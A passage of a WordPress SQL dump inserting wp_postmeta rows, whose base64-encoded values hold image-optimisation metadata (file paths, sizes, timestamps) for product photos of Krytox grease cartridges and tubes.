24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yLW96LXR1YmUtMzAwLWRwaS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMi1vei10dWJlLTMwMC1kcGktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTItb3otdHViZS0zMDAtZHBpLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMzEsInRpbWUiOjE0ODM1ODcxNzksImlkIjozNzh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30223, 377, 'wpfc_optimisation_reduction', '236835'); 
INSERT INTO `wp_postmeta` VALUES (30224, 377, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGkuanBnIiwid2lkdGgiOjE1MDAsImhlaWdodCI6MTUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoyMzY0OTUsInRpbWUiOjE0ODM1ODcxODgsImlkIjoiMzc3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcxOTAsImlkIjozNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MTkyLCJpZCI6Mzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktNzY4eDc2OC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjc2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzE5NSwiaWQiOjM3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcxOTcsImlkIjozNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MTk5LCJpZCI6Mzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzIwMSwiaWQiOjM3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMDQsImlkIjozNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjI4NiwidGltZSI6MTQ4MzU4NzIwNiwiaWQiOjM3N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDMsInRpbWUiOjE0ODM1ODcyMDgsImlkIjozNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMTAsImlkIjozNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMTMsImlkIjozNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMTUsImlkIjozNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtSG9yei0zMDAtZHBpLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLUhvcnotMzAwLWRwaS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS1Ib3J6LTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMTgsImlkIjozNzd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30225, 376, 'wpfc_optimisation_reduction', '233580'); 
INSERT INTO `wp_postmeta` VALUES (30226, 376, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS5qcGciLCJ3aWR0aCI6MTUwMCwiaGVpZ2h0IjoxNTAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoyMzMyNjIsInRpbWUiOjE0ODM1ODcyMjYsImlkIjoiMzc2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMjgsImlkIjozNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MjMxLCJpZCI6Mzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzIzMywiaWQiOjM3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyMzYsImlkIjozNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MjM4LCJpZCI6Mzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibG